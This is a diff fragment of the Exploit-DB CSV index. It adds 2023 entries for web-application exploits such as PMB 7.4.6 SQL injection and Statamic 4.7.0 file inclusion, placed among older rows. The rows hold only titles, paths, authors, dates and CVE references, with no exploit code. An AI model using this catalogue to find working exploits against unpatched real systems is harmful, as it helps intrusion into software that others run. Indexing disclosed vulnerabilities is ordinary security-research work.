 3226,exploits/php/webapps/3226.txt,"PHPFootball 1.6 - Remote Database Disclosure",2007-01-30,ajann,webapps,php,,2007-01-29,2016-12-14,1,OSVDB-33070;CVE-2007-0638,,,,http://www.exploit-db.comPHPfootball1.6.zip,
 7636,exploits/php/webapps/7636.pl,"PHPFootball 1.6 - Remote Hash Disclosure",2009-01-01,KinG-LioN,webapps,php,,2008-12-31,2016-12-21,1,OSVDB-51105;CVE-2009-0711;OSVDB-51104;CVE-2009-0710;OSVDB-51103;OSVDB-51102;CVE-2009-0709,,,,http://www.exploit-db.comPHPfootball1.6.zip,
@@ -27574,6 +27587,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80,2018-08-16,2018-08-16,0,CVE-2018-14059;CVE-2018-14058;CVE-2018-14057,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.compimcore-5.2.3.tar.gz,
 45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80,2018-08-16,2018-08-16,0,CVE-2018-14059;CVE-2018-14058;CVE-2018-14057,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.compimcore-5.2.3.tar.gz,
 51201,exploits/php/webapps/51201.txt,"pimCore v5.4.18-skeleton  - Sensitive Cookie with Improper SameSite Attribute",2023-04-03,nu11secur1ty,webapps,php,,2023-04-03,2023-04-03,0,,,,,,
+51593,exploits/php/webapps/51593.py,"PimpMyLog v1.7.14 - Improper access control",2023-07-19,thoughtfault,webapps,php,,2023-07-19,2023-07-19,0,,,,,,
 31734,exploits/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",webapps,php,80,2014-02-18,2014-03-15,0,OSVDB-103445;OSVDB-103444,,,,http://www.exploit-db.compinacms-master.zip,
 4519,exploits/php/webapps/4519.txt,"Pindorama 0.1 - 'client.php' Remote File Inclusion",2007-10-11,S.W.A.T.,webapps,php,,2007-10-10,2016-10-20,1,OSVDB-37879;CVE-2007-5387,,,,http://www.exploit-db.compindorama-0.1.zip,
 48323,exploits/php/webapps/48323.txt,"Pinger 1.0 - Remote Code Execution",2020-04-15,"Milad karimi",webapps,php,,2020-04-15,2020-04-15,0,,,,,,
@@ -27777,6 +27791,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35625,exploits/php/webapps/35625.txt,"PMB 4.1.3 - (Authenticated) SQL Injection",2014-12-27,"xd4rker dark",webapps,php,,2014-12-27,2014-12-27,0,OSVDB-116480;CVE-2014-9457,,,,,
 49054,exploits/php/webapps/49054.txt,"PMB 5.6 - 'chemin' Local File Disclosure",2020-11-16,41-trk,webapps,php,,2020-11-16,2020-11-16,0,,,,,,
 48356,exploits/php/webapps/48356.txt,"PMB 5.6 - 'logid' SQL Injection",2020-04-21,41-trk,webapps,php,,2020-04-21,2020-04-21,0,,,,,,
+51197,exploits/php/webapps/51197.txt,"PMB 7.4.6 - SQL Injection",2023-04-01,"str0xo DZ",webapps,php,,2023-04-01,2023-07-19,0,,,,,,
 3443,exploits/php/webapps/3443.txt,"PMB Services 3.0.13 - Multiple Remote File Inclusions",2007-03-09,K-159,webapps,php,,2007-03-08,,1,OSVDB-35125;CVE-2007-1415;OSVDB-35124;OSVDB-35123;OSVDB-35122;OSVDB-35121;OSVDB-35120;OSVDB-35119;OSVDB-35118;OSVDB-35117;OSVDB-35116;OSVDB-35115;OSVDB-35114;OSVDB-35113;OSVDB-35112;OSVDB-35111;OSVDB-35110;OSVDB-35109;OSVDB-35108;OSVDB-35107;OSVDB-35106;OSVDB-35105;OSVDB-35104;OSVDB-35103;OSVDB-35102;OSVDB-35101,,,,,http://advisories.echo.or.id/adv/adv68-K-159-2007.txt
 16087,exploits/php/webapps/16087.txt,"PMB Services 3.4.3 - SQL Injection",2011-02-01,Luchador,webapps,php,,2011-02-01,2011-02-01,1,OSVDB-70752,,,,,
 3852,exploits/php/webapps/3852.txt,"PMECMS 1.0 - config[pathMod] Remote File Inclusion",2007-05-04,GoLd_M,webapps,php,,2007-05-03,,1,OSVDB-35781;CVE-2007-2540;OSVDB-35780;OSVDB-35779;OSVDB-35778;OSVDB-35777,,,,,
@@ -30090,6 +30105,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 6406,exploits/php/webapps/6406.txt,"Stash 1.0.3 - Insecure Cookie Handling",2008-09-09,Ciph3r,webapps,php,,2008-09-08,2016-12-23,1,OSVDB-48219;CVE-2008-4081,,,,http://www.exploit-db.comstash-1.0.3.tar.gz,
 6402,exploits/php/webapps/6402.txt,"Stash 1.0.3 - Multiple SQL Injections",2008-09-09,"Khashayar Fereidani",webapps,php,,2008-09-08,2016-12-23,1,OSVDB-47995;CVE-2008-4080;OSVDB-47994,,,,http://www.exploit-db.comstash-1.0.3.tar.gz,
 6714,exploits/php/webapps/6714.pl,"Stash 1.0.3 - SQL Injection User Credentials Disclosure",2008-10-09,gnix,webapps,php,,2008-10-08,2016-12-23,1,OSVDB-49170;CVE-2008-4590;OSVDB-49169,,,,http://www.exploit-db.comstash-1.0.3.tar.gz,
+51602,exploits/php/webapps/51602.txt,"Statamic 4.7.0 - File-Inclusion",2023-07-19,nu11secur1ty,webapps,php,,2023-07-19,2023-07-19,0,,,,,,
 11434,exploits/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,webapps,php,,2010-02-12,,1,OSVDB-62531;CVE-2010-0674;CVE-2008-0843,,,,http://www.exploit-db.comstatcountex-3.1.zip,
 36499,exploits/php/webapps/36499.txt,"StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-04,sonyy,webapps,php,,2012-01-04,2015-03-26,1,CVE-2012-5341;OSVDB-86238,,,,,https://www.securityfocus.com/bid/51280/info
 1752,exploits/php/webapps/1752.pl,"StatIt 4 - 'statitpath' Remote File Inclusion",2006-05-05,IGNOR3,webapps,php,,2006-05-04,,1,OSVDB-25448;CVE-2006-2253,,,,,
@@ -31315,6 +31331,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 6221,exploits/php/webapps/6221.txt,"Vacation Rental Script 3.0 - 'id' SQL Injection",2008-08-10,CraCkEr,webapps,php,,2008-08-09,2016-12-15,1,OSVDB-47372;CVE-2008-3603,,,,,
 15793,exploits/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload",2010-12-20,Br0ly,webapps,php,,2010-12-20,2010-12-20,1,OSVDB-70019,,,,,
 15828,exploits/php/webapps/15828.txt,"Vacation Rental Script 4.0 - Cross-Site Request Forgery",2010-12-25,OnurTURKESHAN,webapps,php,,2010-12-25,2010-12-26,0,,,,,http://www.exploit-db.comvacationrentalscript40.zip,
+51596,exploits/php/webapps/51596.txt,"Vaidya-Mitra 1.0 - Multiple SQLi",2023-07-19,nu11secur1ty,webapps,php,,2023-07-19,2023-07-19,1,,,,,,
 34535,exploits/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 - Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",webapps,php,,2010-08-26,2014-09-05,1,,,,,,https://www.securityfocus.com/bid/42767/info
 25301,exploits/php/webapps/25301.txt,"Valdersoft Shopping Cart 3.0 - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",webapps,php,,2005-03-28,2013-05-08,1,,,,,,https://www.securityfocus.com/bid/12916/info
 2964,exploits/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Inclusions",2006-12-20,mdx,webapps,php,,2006-12-19,,1,OSVDB-32389;CVE-2006-6691,,,,,